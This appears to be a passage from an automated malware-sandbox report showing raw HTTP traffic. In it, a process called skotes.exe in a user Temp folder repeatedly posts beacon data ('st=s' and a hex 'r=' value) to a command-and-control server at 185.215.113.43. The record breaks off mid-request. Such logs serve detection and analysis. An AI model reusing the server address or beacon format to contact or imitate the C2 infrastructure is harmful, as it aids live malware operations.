                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:07.435044050 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:07 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      75192.168.2.652433185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:09.067430973 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:09.774647951 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:09 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      76192.168.2.652435185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:11.307145119 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:12.027237892 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:11 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      77192.168.2.652436185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:13.666250944 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:14.507831097 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:14 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      78192.168.2.652437185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:16.043100119 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:16.763252020 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:16 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      79192.168.2.652438185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:18.392982006 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:19.102965117 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:18 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      80192.168.2.652439185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:20.627197027 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:21.343869925 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:21 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      81192.168.2.652440185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:22.991071939 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:23.691951036 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:23 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      82192.168.2.652441185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:25.216840982 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:25.920300961 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:25 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      83192.168.2.652442185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:27.554888010 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:28.269103050 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:28 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      84192.168.2.652443185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:29.789546967 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:30.494582891 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:30 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      85192.168.2.652452185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:32.127212048 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:32.821230888 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:32 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      86192.168.2.652453185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:34.341836929 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:35.058903933 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:34 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      87192.168.2.652454185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:36.700997114 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:37.403295040 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:37 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      88192.168.2.652455185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:38.914196014 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:39.629544020 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:39 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      89192.168.2.652456185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:41.272231102 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:41.981390953 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:41 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      90192.168.2.652457185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:43.514698982 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
